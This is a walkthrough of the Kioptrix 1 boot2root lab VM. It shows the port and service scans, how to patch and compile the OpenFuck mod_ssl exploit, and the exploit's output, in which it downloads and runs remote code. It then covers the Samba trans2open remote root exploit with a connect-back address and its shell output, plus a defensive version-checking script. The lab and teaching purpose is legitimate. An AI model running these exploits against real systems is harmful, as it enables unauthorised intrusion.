Vulnhub: Kioptrix (#1) Writeup


In this Kioptrix walkthrough writeup, I will walk you through my methodology for rooting a Vulnhub VM known as Kioptrix (#1). This is part 1 of the Kioptrix series and is intended to teach beginners the basics of boot2root challenges.

IP Address Information

Kali IP address: 192.168.178.24
Kioptrix IP address: 192.168.178.20

Procedures

1. To start off, let’s perform a TCP SYN port scan with service discovery using nmap to identify open ports on the target machine.

root@kali:~# nmap -sS -sV 192.168.178.20
Starting Nmap 7.60 ( https://nmap.org ) at 2018-25-03 11:38 +08
Nmap scan report for 192.168.178.20
Host is up (0.00090s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp open ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
1024/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:FC:57:B1 (VMware)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.13 seconds

2. Seeing that ports 80 and 443 are open, let’s run the http-enum NSE script for HTTP enumeration.

root@kali:~# nmap -Pn -p 80,443 --script http-enum 192.168.178.20
Starting Nmap 7.60 ( https://nmap.org ) at 2018-25-03 11:40 +08
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.178.20
Host is up (0.00027s latency).
PORT STATE SERVICE
80/tcp open http
| http-enum:
|_ /test.php: Test page
443/tcp open https
MAC Address: 00:0C:29:FC:57:B1 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 19.79 seconds

Found a test.php page.

3. Next, let’s check out test.php to see if there is a possible entry point.


Looks like a dead end.

4. To enumerate further, let’s run dirb to discover other interesting directories and pages.

root@kali:~# dirb http://192.168.178.20
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sun March 25 11:43:01 2018
URL_BASE: http://192.168.178.20/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.178.20/ ----
+ http://192.168.178.20/~operator (CODE:403|SIZE:273)
+ http://192.168.178.20/~root (CODE:403|SIZE:269)
+ http://192.168.178.20/cgi-bin/ (CODE:403|SIZE:272)
+ http://192.168.178.20/index.html (CODE:200|SIZE:2890)
==> DIRECTORY: http://192.168.178.20/manual/
==> DIRECTORY: http://192.168.178.20/mrtg/
==> DIRECTORY: http://192.168.178.20/usage

5. Next, let’s try to browse around the discovered pages and directories.


From the pages above, we can confirm that the installed Apache version is 1.3.20 and the installed mod_ssl version is 2.8. These are the same versions indicated in the results of the initial port scan.

6. Since we didn’t find any possible entry points on the web application itself, let’s try to search for an existing exploit for either Apache 1.3.20 or mod_ssl 2.8.

root@kali:~# searchsploit mod_ssl 2.8
---------------------------------------------------------------------- ----------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/platforms/)
---------------------------------------------------------------------- ----------------------------------
Apache mod_ssl 2.8.x - Off-by-One HTAccess Buffer Overflow | multiple/dos/21575.txt
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck.c' Remote Exploit | unix/remote/21671.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Exploit | unix/remote/764.c
---------------------------------------------------------------------- ----------------------------------

Nice! There is an existing remote exploit for mod_ssl 2.8. Let’s use the OpenFuckV2 exploit; it sounds fascinating.

7. Next, we have to prepare the exploit and check if any modification is needed.

root@kali:~/Desktop/Kioptrix# cp /usr/share/exploitdb/platforms/unix/remote/764.c .

root@kali:~/Desktop/Kioptrix# gcc 764.c -o 764 -lcrypto
764.c:20:10: fatal error: openssl/ssl.h: No such file or directory
 #include <openssl/ssl.h>
 ^~~~~~~~~~~~~~~
compilation terminated.

Bummer! We need to modify a few things to compile this exploit.

First off, we need to add the following headers:

#include <openssl/rc4.h>
#include <openssl/md5.h>

Next, search for “wget” using your favorite text editor and replace

http://packetstormsecurity.nl/0304-exploits/ptrace-kmod.c

with

http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c

Next, we need to install libssl1.0-dev:

apt-get install libssl1.0-dev

Next, we need to search for “unsigned char *p” and update the declaration from

unsigned char *p, *end;

to

const unsigned char *p, *end;

Lastly, let’s try to compile the exploit.

root@kali:~/Desktop/Kioptrix# gcc 764.c -o OpenFuck -lcrypto

8. If compilation is successful, all we need to do is execute the exploit.

root@kali:~/Desktop/Kioptrix# ./OpenFuck 0x6b 192.168.178.20 -c 40

*******************************************************************
* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena irc.brasnet.org *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************

Connection... 40 of 40
Establishing SSL connection
cipher: 0x4043808c ciphers: 0x80f8050
Ready to send shellcode
Spawning shell...
Good Bye!

Disclaimer: So I tried to execute this exploit several times but unfortunately it didn’t work for me. Based on my research, this exploit is really unreliable but somehow it worked for others. I didn’t want to spend so much time on this exploit so I tried to find another way in.

Update: I tried this exploit later and I got root.

root@kali:~/Desktop/Kioptrix# ./OpenFuck 0x6b 192.168.178.20 -c 40

*******************************************************************
* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena irc.brasnet.org *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************

Connection... 40 of 40
Establishing SSL connection
cipher: 0x4043808c ciphers: 0x80f8050
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$ 
exploits/ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; net/0304- 
--06:57:25--  http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
           => `ptrace-kmod.c'
Connecting to dl.packetstormsecurity.net:80... connected!
HTTP request sent, awaiting response... 301 Moved Permanently
Location: https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c [following]
--06:57:26--  https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
           => `ptrace-kmod.c'
Connecting to dl.packetstormsecurity.net:443... connected!
HTTP request sent, awaiting response... 200 OK
Length: 3,921 [text/x-csrc]

    0K ...                                                   100% @   3.74 MB/s

06:57:27 (3.74 MB/s) - `ptrace-kmod.c' saved [3921/3921]

/usr/bin/ld: cannot open output file p: Permission denied
collect2: ld returned 1 exit status
is
/bin/sh: is: command not found
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

uname -a
Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown


9. Since the exploit for mod_ssl didn’t work, let’s proceed to look for another way in. We can enumerate port 139 (Samba) via enum4linux.

root@kali:~/Desktop/Kioptrix# enum4linux 192.168.178.20
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun March 25 12:33:26 2018
==========================
| Target Information |
==========================
Target ........... 192.168.178.20
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
<-------------------------------TRUNCATED------------------------------->
 =========================================== 
|    Share Enumeration on 192.168.178.20   |
 =========================================== 
WARNING: The "syslog" option is deprecated
Domain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.1a]
Domain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.1a]

	Sharename       Type      Comment
	---------       ----      -------
	IPC$            IPC       IPC Service (Samba Server)
	ADMIN$          IPC       IPC Service (Samba Server)

	Server               Comment
	---------            -------
	KIOPTRIX             Samba Server

	Workgroup            Master
	---------            -------
	MYGROUP              KIOPTRIX
<-------------------------------TRUNCATED------------------------------->

From the results, we can note that the Samba version is 2.2.1a.

10. Let’s search for an existing exploit for Samba version 2.2.1a.

root@kali:~/Desktop/Kioptrix# searchsploit samba 2.2
---------------------------------------------------------------------- ----------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/platforms/)
---------------------------------------------------------------------- ----------------------------------
(Linux Kernel 2.6) Samba 2.2.8 (Debian / Mandrake) - Share Privilege | linux/local/23674.txt
Samba 2.0.x/2.2 - Arbitrary File Creation | unix/remote/20968.txt
Samba 2.2.0 < 2.2.8 (OSX) - trans2open Overflow (Metasploit) | osx/remote/9924.rb
Samba 2.2.2 < 2.2.6 - 'nttrans' Buffer Overflow (Metasploit) (1) | linux/remote/16321.rb
Samba 2.2.8 (BSD x86) - 'trans2open' Overflow Exploit (Metasploit) | bsd_x86/remote/16880.rb
Samba 2.2.8 (Linux x86) - 'trans2open' Overflow (Metasploit) | lin_x86/remote/16861.rb
Samba 2.2.8 (OSX/PPC) - 'trans2open' Overflow (Metasploit) | osx_ppc/remote/16876.rb
Samba 2.2.8 (Solaris SPARC) - 'trans2open' Overflow (Metasploit) | solaris_sparc/remote/16330.rb
Samba 2.2.8 - (Brute Force Method) Remote Command Execution | linux/remote/55.c
Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (1) | unix/remote/22468.c
Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (2) | unix/remote/22469.c
Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (3) | unix/remote/22470.c
Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (4) | unix/remote/22471.txt
Samba 2.2.x - 'nttrans' Overflow (Metasploit) | linux/remote/9936.rb
Samba 2.2.x - Buffer Overflow | linux/remote/7.pl
Samba 2.2.x - CIFS/9000 Server A.01.x Packet Assembling Buffer Overfl | unix/remote/22356.c
Samba < 2.2.8 (Linux/BSD) - Remote Code Execution | multiple/remote/10.c
---------------------------------------------------------------------- ----------------------------------
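From the defender's side, the real lesson of steps 1, 6 and 10 is that the scan banners alone give the game away: mod_ssl 2.8.4 and Samba 2.2.1a both sit below the first fixed releases named in the searchsploit titles (2.8.7 and 2.2.8). The following script is an added example, not part of the original writeup; it parses the nmap -sV and enum4linux lines shown above (pasted in as a constructed sample) and flags any version below those thresholds, handling the letter suffix in "2.2.1a" that naive string comparison would get wrong.

```python
import re

# Constructed sample: the nmap -sV lines for ports 80/139/443 and the
# enum4linux server banner from this writeup, pasted as one string.
SAMPLE_OUTPUT = """\
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp open ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
Domain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.1a]
"""

# Each check: (regex capturing the version string, first fixed version,
# label). Thresholds come from the searchsploit titles on this page:
# "mod_ssl < 2.8.7" and "Samba < 2.2.8". Regexes are assumptions.
CHECKS = [
    (re.compile(r"mod_ssl/(\d[\w.]*)"), (2, 8, 7), "mod_ssl"),
    (re.compile(r"Server=\[Samba (\d[\w.]*)\]"), (2, 2, 8), "Samba"),
]


def parse_version(text):
    """Turn '2.2.1a' or '2.8.4' into a tuple of ints; trailing letters are dropped."""
    parts = []
    for piece in text.split("."):
        m = re.match(r"\d+", piece)
        if m:
            parts.append(int(m.group()))
    return tuple(parts)


def find_outdated(output):
    """Return sorted (label, version) pairs whose version is below the fixed one."""
    findings = set()  # mod_ssl shows up on both 80 and 443; report it once
    for line in output.splitlines():
        for pattern, fixed, label in CHECKS:
            m = pattern.search(line)
            if m and parse_version(m.group(1)) < fixed:
                findings.add((label, m.group(1)))
    return sorted(findings)


if __name__ == "__main__":
    for label, version in find_outdated(SAMPLE_OUTPUT):
        print(f"[!] {label} {version} is below the first fixed release")
```

Feed it `nmap -sV -oN` output or enum4linux output from your own asset scans and extend CHECKS with the fixed versions from your patch notes.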

11. Next, let’s try to compile the remote code execution exploit for Samba < 2.2.8 (Linux/BSD).

root@kali:~/Desktop/Kioptrix# gcc 10.c -o 10
root@kali:~/Desktop/Kioptrix# ./10
samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
--------------------------------------------------------------
Usage: ./10 [-bBcCdfprsStv] [host]

-b  bruteforce (0 = Linux, 1 = FreeBSD/NetBSD, 2 = OpenBSD 3.1 and prior, 3 = OpenBSD 3.2)
-B  bruteforce steps (default = 300)
-c  connectback ip address
-C  max childs for scan/bruteforce mode (default = 40)
-d  bruteforce/scanmode delay in micro seconds (default = 100000)
-f force
-p  port to attack (default = 139)
-r  return address
-s scan mode (random)
-S  scan mode
-t  presets (0 for a list)
-v verbose mode

12. Finally, let’s execute the exploit with our IP as the callback address and the Kioptrix IP as the target.

root@kali:~/Desktop/Kioptrix# ./10 -c 192.168.178.24 -b 0 192.168.178.20
samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
--------------------------------------------------------------
+ Bruteforce mode. (Linux)
+ Host is running samba.
+ Worked!
--------------------------------------------------------------
*** JE MOET JE MUIL HOUWE
Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown
uid=0(root) gid=0(root) groups=99(nobody)

/bin/sh -i
sh: no job control in this shell
sh-2.05# whoami
root

Got root!

That’s it! Thanks for reading and I hope you learned something new today. Cheers!
